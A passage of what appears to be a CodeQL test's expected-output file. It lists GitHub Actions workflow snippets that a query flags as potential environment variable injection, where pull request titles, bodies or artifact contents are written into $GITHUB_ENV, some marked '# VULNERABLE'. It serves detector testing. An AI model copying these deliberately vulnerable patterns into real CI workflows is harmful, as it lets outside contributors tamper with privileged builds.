$GITHUB_ENV | provenance | Config | +| .github/workflows/test11.yml:15:9:21:6 | Uses Step | .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | provenance | Config | +| .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | provenance | Config | +| .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | Config | +| .github/workflows/test12.yml:55:9:61:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | Config | +| .github/workflows/test16.yml:10:9:15:6 | Uses 
Step | .github/workflows/test16.yml:15:14:17:63 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test16.yml:10:9:15:6 | Uses Step | .github/workflows/test16.yml:18:14:20:77 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | provenance | Config | +nodes +| .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | semmle.label | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | +| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | semmle.label | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | +| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/test2.yml:12:9:41:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | semmle.label | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | +| .github/workflows/test3.yml:13:7:20:4 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | semmle.label | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> 
$GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | semmle.label | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:15:19:15:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | semmle.label | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:19:19:19:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | semmle.label | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | semmle.label | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | semmle.label | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | +| .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| 
.github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | semmle.label | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | +| .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | semmle.label | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | +| .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | semmle.label | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | +| .github/workflows/test4.yml:60:19:60:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test5.yml:10:9:30:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | semmle.label | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | +| .github/workflows/test6.yml:11:19:11:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | semmle.label | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | +| .github/workflows/test6.yml:16:19:16:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | semmle.label | FOO=$TITLE+\necho PR_TITLE=$FOO >> 
$GITHUB_ENV\n | +| .github/workflows/test6.yml:21:19:21:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | semmle.label | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | +| .github/workflows/test7.yml:9:9:16:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test7.yml:16:9:24:35 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test8.yml:24:9:30:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test8.yml:31:14:33:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | semmle.label | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | +| .github/workflows/test8.yml:35:14:36:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | semmle.label | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | +| .github/workflows/test8.yml:38:14:39:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | semmle.label | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | +| .github/workflows/test9.yml:19:9:27:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | semmle.label | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> 
$GITHUB_ENV\n | +| .github/workflows/test10.yml:20:9:26:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | semmle.label | cat foo/.github/java-config.env >> $GITHUB_ENV | +| .github/workflows/test11.yml:15:9:21:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | +| .github/workflows/test12.yml:38:9:46:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | +| .github/workflows/test12.yml:55:9:61:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | +| .github/workflows/test13.yml:18:14:20:65 | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | semmle.label | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | +| .github/workflows/test13.yml:22:14:23:70 | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | semmle.label | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | +| .github/workflows/test14.yml:14:14:15:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | semmle.label | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | +| .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | semmle.label | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho 
"CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | +| .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | semmle.label | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | +| .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | semmle.label | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | +| .github/workflows/test16.yml:10:9:15:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test16.yml:15:14:17:63 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | semmle.label | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | +| .github/workflows/test16.yml:18:14:20:77 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | semmle.label | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | +subpaths +#select +| .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | .github/workflows/artifactpoisoning51.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/artifactpoisoning52.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/artifactpoisoning53.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | .github/workflows/test2.yml:3:3:3:14 | workflow_run | workflow_run | +| .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | .github/workflows/test3.yml:13:7:20:4 | Uses Step | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | .github/workflows/test3.yml:3:3:3:14 | workflow_run | workflow_run | +| .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | .github/workflows/test4.yml:15:19:15:56 | github.event.pull_request.title | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | .github/workflows/test4.yml:19:19:19:56 | github.event.pull_request.title | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | .github/workflows/test4.yml:60:19:60:56 | github.event.pull_request.title | .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | .github/workflows/test5.yml:3:3:3:14 | workflow_run | workflow_run | +| .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | .github/workflows/test6.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | .github/workflows/test6.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | .github/workflows/test6.yml:16:19:16:56 | github.event.pull_request.title | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | .github/workflows/test6.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | .github/workflows/test6.yml:21:19:21:56 | github.event.pull_request.title | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | .github/workflows/test6.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test7.yml:16:9:24:35 | Uses Step | .github/workflows/test7.yml:9:9:16:6 | Uses Step | .github/workflows/test7.yml:16:9:24:35 | Uses Step | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test7.yml:16:9:24:35 | Uses Step | Uses Step | .github/workflows/test7.yml:4:5:4:16 | workflow_run | workflow_run | +| .github/workflows/test8.yml:31:14:33:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | .github/workflows/test8.yml:24:9:30:6 | Uses Step | .github/workflows/test8.yml:31:14:33:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test8.yml:31:14:33:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | .github/workflows/test8.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test8.yml:35:14:36:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | .github/workflows/test8.yml:24:9:30:6 | Uses Step | .github/workflows/test8.yml:35:14:36:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test8.yml:35:14:36:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | .github/workflows/test8.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test8.yml:38:14:39:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> 